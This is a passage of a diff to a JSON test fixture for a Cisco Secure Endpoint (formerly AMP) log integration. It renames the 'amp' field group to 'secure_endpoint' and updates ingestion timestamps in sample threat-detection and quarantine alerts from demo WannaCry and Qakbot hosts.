Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419229327140847658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -3174,7 +3178,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Variant:Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -3242,7 +3246,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:28.111214921Z",
+                "ingested": "2021-09-27T00:41:58.139887993Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":717000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204897366867969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -3253,7 +3257,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Variant:Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -3321,7 +3325,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:28.111216991Z",
+                "ingested": "2021-09-27T00:41:58.139889716Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -3332,7 +3336,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Variant:Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -3400,7 +3404,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:28.111219057Z",
+                "ingested": "2021-09-27T00:41:58.139891442Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":639000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204897366867977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -3411,7 +3415,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Variant:Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -3473,7 +3477,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:28.111221104Z",
+                "ingested": "2021-09-27T00:41:58.139893184Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":994000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412604589194870787\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -3483,7 +3487,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -3564,7 +3568,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:28.111223166Z",
+                "ingested": "2021-09-27T00:41:58.139894909Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":573000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870787\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3575,7 +3579,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -3645,7 +3649,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:28.111225235Z",
+                "ingested": "2021-09-27T00:41:58.139896645Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":479000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870786\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"\",\"file_path\":\"\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3656,7 +3660,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -3734,7 +3738,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:28.111227296Z",
+                "ingested": "2021-09-27T00:41:58.139898403Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":479000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870785\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3745,7 +3749,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -3807,7 +3811,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:28.111229346Z",
+                "ingested": "2021-09-27T00:41:58.139900121Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":994000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412604589194870785\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -3817,7 +3821,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -3878,7 +3882,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:28.111231419Z",
+                "ingested": "2021-09-27T00:41:58.139901882Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239055241773000,\"timestamp\":1610637529,\"timestamp_nanoseconds\":242000000,\"date\":\"2021-01-14T15:18:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419239055241773128\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -3888,7 +3892,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -3974,7 +3978,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:28.111233495Z",
+                "ingested": "2021-09-27T00:41:58.139903619Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239055241773000,\"timestamp\":1610637529,\"timestamp_nanoseconds\":242000000,\"date\":\"2021-01-14T15:18:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419239055241773128\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3985,7 +3989,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -4051,7 +4055,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:28.111235554Z",
+                "ingested": "2021-09-27T00:41:58.139905342Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239050946806000,\"timestamp\":1610637528,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T15:18:48+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419239046651838535\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -4061,7 +4065,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -4122,7 +4126,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:28.111237711Z",
+                "ingested": "2021-09-27T00:41:58.139907178Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229331435814971\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -4132,7 +4136,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -4197,7 +4201,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:28.111239763Z",
+                "ingested": "2021-09-27T00:41:58.139908941Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":56000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229331435814970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -4207,7 +4211,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -4284,7 +4288,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:28.111241843Z",
+                "ingested": "2021-09-27T00:41:58.139910680Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":773000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782278\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -4295,7 +4299,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -4369,7 +4373,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:28.111243912Z",
+                "ingested": "2021-09-27T00:41:58.139912392Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":648000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat 